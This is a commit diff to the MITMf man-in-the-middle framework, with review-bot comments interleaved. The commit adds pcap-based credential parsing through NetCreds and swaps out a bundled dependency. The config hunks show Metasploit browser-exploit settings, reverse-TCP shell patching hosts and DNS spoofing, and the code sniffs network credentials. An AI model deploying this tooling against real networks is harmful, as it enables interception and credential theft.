added an option to parse creds from a pcap using NetCreds, removed mitmflib as a dep (was causing problems for travis)

This commit is contained in:
byt3bl33d3r 2015-08-11 17:11:44 +02:00
parent 0a00f671b8
commit 1a50f000c1
9 changed files with 51 additions and 23 deletions


@ -37,7 +37,7 @@
nameservers = 8.8.8.8 nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records [[[A]]] # Queries for IPv4 address records
*.thesprawl.org=192.168.178.27 *.butt.org=192.168.178.27
[[[AAAA]]] # Queries for IPv6 address records [[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1 *.thesprawl.org=2001:db8::1
@ -79,7 +79,7 @@
[Replace] [Replace]
[[Regex1]] [[Regex1]]
'Google Search' = 'Google In My Pants' 'Google Search' = 'Google yssas'
[[Regex2]] [[Regex2]]
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants" "I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
@ -240,7 +240,7 @@
msfport = 8080 # Port to start Metasploit's webserver which will host the exploits msfport = 8080 # Port to start Metasploit's webserver which will host the exploits
[[exploits]] [[exploits]]
[[[multi/browser/java_rhino]]] #Exploit's MSF path [[[multi/browser/java_rhino]]] #Exploit's MSF path
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
@ -447,7 +447,7 @@
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump # PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = PATCH_METHOD =
HOST = 10.9.135.193 HOST = 172.16.206.7
PORT = 8444 PORT = 8444
SHELL = iat_reverse_tcp_stager_threaded SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None
@ -459,7 +459,7 @@
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
# PATCH_METHOD overwrites PATCH_TYPE with jump # PATCH_METHOD overwrites PATCH_TYPE with jump
PATCH_METHOD = PATCH_METHOD =
HOST = 10.9.135.193 HOST = 172.16.206.1
PORT = 8088 PORT = 8088
SHELL = iat_reverse_tcp_stager_threaded SHELL = iat_reverse_tcp_stager_threaded
SUPPLIED_SHELLCODE = None SUPPLIED_SHELLCODE = None


@ -18,8 +18,8 @@
# USA # USA
# #
from mitmflib.watchdog.observers import Observer from watchdog.observers import Observer
from mitmflib.watchdog.events import FileSystemEventHandler from watchdog.events import FileSystemEventHandler
from configobj import ConfigObj from configobj import ConfigObj
class ConfigWatcher(FileSystemEventHandler): class ConfigWatcher(FileSystemEventHandler):


@ -48,10 +48,15 @@ class NetCreds:
def sniffer(self, interface, ip): def sniffer(self, interface, ip):
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0) sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
def start(self, interface, ip): def start(self, interface, ip, pcap):
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,)) if pcap:
t.setDaemon(True) for pkt in PcapReader(pcap):
t.start() pkt_parser(pkt)
sys.exit()
else:
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def pkt_parser(pkt): def pkt_parser(pkt):
''' '''
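Review bot: The new `pcap` parameter of `start` has no default, so any caller that still passes only `(interface, ip)` now fails with a TypeError; `def start(self, interface, ip, pcap=None):` keeps the old call shape working while the new `mitmf.py` call keeps passing `options.read_pcap`. In the pcap branch the `PcapReader` is iterated but never closed, and `sys.exit()` is issued from inside a library method, which makes `start` unusable from any code that wants to parse a capture without terminating the process; if the exit stays, a comment should state that `--read-pcap` mode ends the program here. Whether `sys` and `PcapReader` are imported at the top of the module is outside the hunk, as are the rest of the `NetCreds` class and the body of `pkt_parser`.
```python
    def start(self, interface, ip, pcap=None):
        if pcap:
            reader = PcapReader(pcap)
            try:
                for pkt in reader:
                    pkt_parser(pkt)
            finally:
                reader.close()
            # --read-pcap mode: parse the capture, then end the process
            sys.exit()
        else:
            # … unchanged: sniffer thread start …
```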


@ -149,7 +149,7 @@ class Settings(ConfigWatcher):
self.AnalyzeMode = options.analyze self.AnalyzeMode = options.analyze
#self.Upstream_Proxy = options.Upstream_Proxy #self.Upstream_Proxy = options.Upstream_Proxy
self.Verbose = False self.Verbose = True
if options.log_level == 'debug': if options.log_level == 'debug':
self.Verbose = True self.Verbose = True
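Review bot: Changing the default to `self.Verbose = True` makes the following `if options.log_level == 'debug': self.Verbose = True` a no-op, so verbose output is now on regardless of `--log-level`. If always-verbose is intended the dead check should be removed; if not, this looks like a debugging edit left in and the line should return to `self.Verbose = False`. The enclosing `Settings` method starts and ends outside the hunk.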


@ -42,7 +42,7 @@ from core.configwatcher import ConfigWatcher
from core.utils import shutdown from core.utils import shutdown
from core.logger import logger from core.logger import logger
from mitmflib.dnslib import * from dnslib import *
from IPy import IP from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S") formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")


@ -25,7 +25,7 @@ import gzip
import StringIO import StringIO
import sys import sys
from mitmflib.user_agents import parse from user_agents import parse
from twisted.web.http import HTTPClient from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor from URLMonitor import URLMonitor
from core.proxyplugins import ProxyPlugins from core.proxyplugins import ProxyPlugins


@ -21,7 +21,7 @@
import logging import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message
logging.getLogger("mitmflib.watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages
import argparse import argparse
import sys import sys
@ -54,6 +54,7 @@ sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="
sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
@ -84,6 +85,10 @@ log = logger().setup_logger("MITMf", formatter)
log.debug("MITMf started: {}".format(sys.argv)) log.debug("MITMf started: {}".format(sys.argv))
#Start Net-Creds
from core.netcreds import NetCreds
NetCreds().start(options.interface, options.ip, options.read_pcap)
from core.sslstrip.CookieCleaner import CookieCleaner from core.sslstrip.CookieCleaner import CookieCleaner
from core.proxyplugins import ProxyPlugins from core.proxyplugins import ProxyPlugins
from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.StrippingProxy import StrippingProxy
@ -135,16 +140,13 @@ if options.filter:
print "|_ PacketFilter online" print "|_ PacketFilter online"
print "| |_ Applying filter {} to incoming packets".format(options.filter) print "| |_ Applying filter {} to incoming packets".format(options.filter)
print "|_ Net-Creds v{} online".format(NetCreds.version)
#Start mitmf-api #Start mitmf-api
from core.mitmfapi import mitmfapi from core.mitmfapi import mitmfapi
print "|_ MITMf-API online" print "|_ MITMf-API online"
mitmfapi().start() mitmfapi().start()
#Start Net-Creds
from core.netcreds import NetCreds
NetCreds().start(options.interface, options.ip)
print "|_ Net-Creds v{} online".format(NetCreds.version)
#Start the HTTP Server #Start the HTTP Server
from core.servers.HTTP import HTTP from core.servers.HTTP import HTTP
HTTP().start() HTTP().start()
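Review bot: The new `NetCreds().start(options.interface, options.ip, options.read_pcap)` placed before the proxy and server startup gives no hint that, with `-r/--read-pcap`, `start` parses the capture and terminates the process before anything below it runs; a comment such as `# With --read-pcap, NetCreds parses the capture and exits the process here` at that call would spare the next reader a trip into core/netcreds. Whether `-i` and the interface-derived `options.ip` are still required when only a pcap is read is not visible in this hunk; if they are, the `--read-pcap` help text should say so. The startup code is module-level and continues outside the hunk.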


@ -22,8 +22,8 @@ import os
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.inject import Inject from plugins.inject import Inject
from core.beefapi import BeefAPI from core.beefapi import BeefAPI
from mitmflib.watchdog.observers import Observer from watchdog.observers import Observer
from mitmflib.watchdog.events import FileSystemEventHandler from watchdog.events import FileSystemEventHandler
class BeefAutorun(Inject, Plugin): class BeefAutorun(Inject, Plugin):
name = "BeEFAutoloader" name = "BeEFAutoloader"


@ -1,2 +1,23 @@
git+git://github.com/kti/python-netfilterqueue git+git://github.com/kti/python-netfilterqueue
mitmflib pycrypto>=2.6
pyasn1>=0.1.7
cryptography
Pillow
netaddr
scapy
dnslib
Twisted
pefile
ipy
user_agents
pyopenssl
service_identity
configobj
Flask
dnspython
beautifulsoup4
capstone
msgpack-python
watchdog
requests
pypcap
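Review bot: The packages that replace `mitmflib` are unpinned except for the lower bounds on `pycrypto` and `pyasn1`, so every install resolves to whatever the index serves that day and a Travis failure or behaviour change cannot be traced to a dependency version; pinning with `==` (or at least upper bounds) gives reproducible builds and a reviewable upgrade path. The pre-existing `git+git://` line installs over an unauthenticated transport; `git+https://` would let git verify the server it talks to.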